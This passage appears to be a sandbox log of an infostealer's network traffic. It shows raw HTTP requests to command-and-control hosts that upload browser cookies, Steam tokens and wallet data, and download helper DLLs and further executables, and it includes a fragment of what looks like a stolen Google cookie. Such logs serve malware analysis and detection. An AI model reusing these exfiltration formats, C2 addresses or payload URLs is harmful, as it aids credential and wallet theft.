Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 48 2d 2d 0d 0a Data Ascii: ------BAEGCGCGIEGDHIDHJJEHContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------BAEGCGCGIEGDHIDHJJEHContent-Disposition: form-data; name="message"fplugins------BAEGCGCGIEGDHIDHJJEH--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFHost: 185.215.113.17Content-Length: 7015Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="file"------KECFCGHIDHCAKEBFCFHC--
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file"------CAEBGHDBKEBGIDHJJEHC--
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000254001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 185.215.113.17Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"wallets------JEBKKEGDBFIIEBFHIEHC--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"files------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="message"ybncbhylepme------AAEHJEGIIDAECAAKEBKF--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000322001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build"default------CBFCBKKFBAEHJKEBKFCB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="message"browsers------IDHIEBAAKJDHIECAAFHC--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 2d 2d 0d 0a Data Ascii: ------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; 